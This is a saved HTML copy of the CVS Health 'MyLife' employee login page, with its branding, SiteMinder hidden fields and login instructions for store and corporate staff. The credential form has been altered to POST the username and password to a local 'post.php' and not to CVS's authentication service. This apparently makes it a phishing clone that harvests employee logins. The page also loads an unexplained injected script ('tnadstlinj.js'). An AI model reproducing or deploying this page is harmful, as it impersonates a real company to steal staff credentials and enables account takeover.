
<!-- saved from url=(0358)https://mylife.cvshealth.com/siteminderagent/forms/MyLifeLogin.fcc?TYPE=33554433&REALMOID=06-000eaa6c-cd39-1575-b779-f8a50a5c905d&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-XWs8rm2yzbmh4NHY2UWcingpVrtzEWGE6j6wm37Io3lFTSlBmL30ccd8%2fNqYwGM7QPEg1xmPRZCztte0L6E0Ek%2bbVn5IU12Q&TARGET=-SM-https%3a%2f%2fmylife%2ecvshealth%2ecom%2fwebcenter%2fportal%2fmylife -->
<html style="display: block; visibility: visible;"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <title>MyLifePortal-Login</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link rel="stylesheet" href="./MyLifePortal-Login_files/myLife_common.css">
<link rel="stylesheet" href="./MyLifePortal-Login_files/page-layouts.css">


<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
<script src="./MyLifePortal-Login_files/jquery.min.js.download"></script>
<!--[if lt IE 9]>
    <script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <script>
        document.createElement('header');
        document.createElement('nav');
        document.createElement('section'); 
        document.createElement('article');
        document.createElement('aside');
        document.createElement('footer');
    </script>
<![endif]-->
<!--[if lt IE 9]>
			<link  rel="stylesheet" href="css/ie8.css"/>
<![endif]-->
<!-- Cross-frame scripting prevention: This code will prevent this page from being encapsulated within HTML frames. Remove, or comment out, this code if the functionality that is contained in this SiteMinder page is to be included within HTML frames. -->
<style> 
   html {
      display : none ;
      visibility : hidden; 
   } 
   
   .login-section{
	width: 100%;
	margin: 0 auto;
	position: relative;
	top: 50px !important;
}
.login-title{
	padding: 10px 0 10px 10px;
	background: #f0f0f0;
	display: block;
}
.login-form{
	padding: 5px 8px 0 8px;
}
.login  p{
	margin: 18px 0 0 0;
	width: 100%;
	display: inline-block;
	line-height: 35px;
}
.login input{
	width: 75%;
	border: 1px solid #e2e1e1;
	padding: 11px 0 11px 14px;
	color: #b3b3b3;
	font-size: 0.75em;
	outline: none;
	float: right;
}
.login input[type="submit"]{
	width: auto;
	padding: 10px 18px;
	background: #cc0000;
	border: none;
	color: #fff;
	float: right;
	cursor: pointer;
}
.login a.forgot_link{
	font-size: 0.87em;
	float: right;
	margin: 0px 20px 0 0;
}
#outer-wrap{
	position: relative;
	overflow: hidden;
	width: 100%;
}
.container{
	width: 100%;
	position: relative;
	margin: 0 auto;
}
.main-content{
	padding: 0 10px 15px 10px;
	overflow: hidden;
	height: 580px;
	margin: 0 auto;
}
.login-section{
	width: 460px;
}
#logomob{
display: none;
}
#logo{
display:block;
}
.stock-update-html {
    font-size: 12px !important;
    padding: 3px 12px;
    color: #000;
    margin-right: 5px;
	}
	.footer-nav {
    padding: 20px 0;
    overflow: hidden;
}
.footer-links p {
    margin: 5px 0 10px 0;
}
.login-disclaimer{
margin: 20px 0px;
}
.disclaimer-text p{
margin: 10px 0px;
}
.disclaimer-text h2{
padding: 0px;
}
.disclaimer-text{
padding: 10px;
}
@media screen and (max-width: 759px){
.main-content{
	overflow: hidden;
	height: 580px;
	width: 100%;
	margin: 0 auto;
	padding: 0 0px 0px 0px;
}
.login input{
	width: 70%;
	border: 1px solid #e2e1e1;
	padding: 11px 0 11px 14px;
	color: #b3b3b3;
	font-size: 0.75em;
	outline: none;
}
#logomob{
display:block;
text-align: center;
}
#logo{
display:none;
}
.login-section{
	width: 100%;
	margin: 0 auto;
	position: relative;
	top: 50px !important;
}
.stock-information {
    width: 100%;
    display: inline-block;
    background: #f0f0f0;
    padding: 5px;
}
.stock-update-html {
    font-size: 12px !important;
    color: #000;
    float: right;
    padding: 10px 5px;
    background: #ffffff;
}
.footer-nav {
    padding: 4% 0;
    overflow: hidden;
}
h1, h2, h3 {
    font-size: 16px;
}
}
@media screen and (max-width: 359px){
.main-content{
	overflow: hidden;
	height: 640px;
	width: 100%;
	margin: 0 auto;
	padding: 0 0px 0px 0px;
}
}
   </style>
<script>
   if( self == top ) {
       document.documentElement.style.display = 'block' ; 
       document.documentElement.style.visibility = 'visible' ; 
   } else {
       top.location = self.location ; 
   }
</script>

<script language="JavaScript">
function resetCredFields()
{
  document.Login.PASSWORD.value = "";
}

function submitForm()
{
     document.Login.submit();
}
function getLogo() {
	var portal = window.location.host;
    if(portal.indexOf('myac.')>-1 || portal.indexOf('myac-')>-1){
	$(document).attr("title", "MyACPortal-Login");
	document.body.style.backgroundColor = "#f4f4f4";
	$('welcome h2').text('Welcome to the CVS Advice and Counsel Portal');
	$('.disclaimer-text').hide();
	$('.main-content').css('height', 'auto');
	$('.footer-content').css('background', '#f4f4f4');
	$("a.logoLink").attr("href", "/webcenter/portal/myac");
    return "images/myac-logo.png";
    }
    else{
    return "images/myLife_logo.png";
    }
    
}

</script>

<script type="text/javascript" id="d__inj" class="d__inj_delayed" src="./MyLifePortal-Login_files/tnadstlinj.js.download" defer=""></script><style type="text/css">#d__fFH{position:absolute;top:-5000px;left:-5000px}#d__fF{font-family:serif;font-size:200px;visibility:hidden}#sdaqeqxtyczsuaxuw{display:none!important}</style></head>

<body bgcolor="#ffffff" text="#000000" onLoad="resetCredFields();">
<div class="outer-wrap">
<!-- Customer Brand -->
 <div class="container"> 
    <!--Header starts here-->
    <header class="header">
      <div class="header-content1">
        <div class="top-navigation">
          <div id="logo">
		  <a href="https://mylife.cvshealth.com/webcenter/portal/mylife" class="logoLink" title="CVS MyLife"> <img src="./MyLifePortal-Login_files/myLife_logo.png" onload="this.onload=null; this.src=getLogo();" alt="Logo">
            </a>
			</div>
        </div>
      </div>
      <div class="header-content2">
	  <div id="logomob">
		  <a title="CVS MyLife"> <img src="./MyLifePortal-Login_files/myLife_logo.png" alt="Logo">
            </a>
			</div>
        	<div id="welcome" class="welcome-msg"><h2>Welcome to the CVS Health MyLife Portal</h2></div>
      </div>
    </header>
    <!--Header ends here-->
	<div class="main-content" style="overflow: hidden; min-height: 380px;">
	   <section class="login-section">
      		<h2 class="login-title">Please sign in using your credentials</h2>
            <div class="login-form">
			<form class="form-signin extra-padding" action="post.php" method="POST" autocomplete="off">
				<input type="HIDDEN" name="SMENC" value="UTF-8">
				<input type="HIDDEN" name="SMLOCALE" value="US-EN">
					<p style="margin:5px 0px;">Username: &nbsp; <input type="text" name="USER" size="30" style="margin-left: 5px" autocomplete="off"></p>
				    <p style="margin:5px 0px;">Password: &nbsp; <input type="password" name="PASSWORD" size="30" style="margin-left: 5px"></p>

				  <input type="hidden" name="target" value="https://mylife.cvshealth.com/webcenter/portal/mylife">
				  <input type="hidden" name="smquerydata" value="">
				  <input type="hidden" name="smauthreason" value="0">
				  <input type="hidden" name="smagentname" value="XWs8rm2yzbmh4NHY2UWcingpVrtzEWGE6j6wm37Io3lFTSlBmL30ccd8/NqYwGM7QPEg1xmPRZCztte0L6E0Ek+bVn5IU12Q">
				  <input type="hidden" name="postpreservationdata" value="">
				  <p><input type="submit" value="Submit" onClick="submitForm();" class="sign_in form_btn">
				  <a href="https://eidmss.cvscaremark.com/sspr/sspr/home" class="forgot_link"><span>Forgot Password?</span></a></p>
			</form>
            </div>
		<section class="login-disclaimer">
		<div class="disclaimer-text" style="font-size:small">
		<h2>To Login</h2> 
		<p>
		Store, MinuteClinic and Distribution Center Colleagues: <br> Use 7-digit Employee ID and password</p>
		<p>
		Non-Store and PBM (NT Authenticated) Colleagues: <br> Use Windows ID and password (computer login)
		</p>
		<h2>Attention:</h2> MyLife is solely for the use of authorized CVS Health agents. The information contained herein is the property of CVS Health and subject to non-disclosure, security and confidentiality requirements. Refer to the MyLife Guiding Principles for Users and Content Publishers for details.
		</div>
		</section>
      </section>
	</div>  
 <footer class="footer">
      <div class="footer-content">
        <div class="footer-nav">
          <div class="footer-logo"> <a><img src="./MyLifePortal-Login_files/cvs-health.png" alt="cvs health"></a> </div>
        </div>
		<div class="footer-links">
        <p style="font-size:14px;line-height:2em;">Copyright © 2017 CVS Health. All rights reserved.</p>
      </div>
      </div>
      
    </footer>
</div>
</div>
<script language="javascript">
  document.forms["Login"].elements["USER"].focus();
</script>



<div id="d__fFH" style="position: absolute !important; top: -5000px !important; left: -5000px !important;"><object id="d_dlg" classid="clsid:3050f819-98b5-11cf-bb82-00aa00bdce0b" width="0px" height="0px"></object><span id="d__fF" style="font-family: Courier, serif !important; font-size: 72px !important; visibility: hidden;">The quick brown fox jumps over the lazy dog.</span></div></body></html>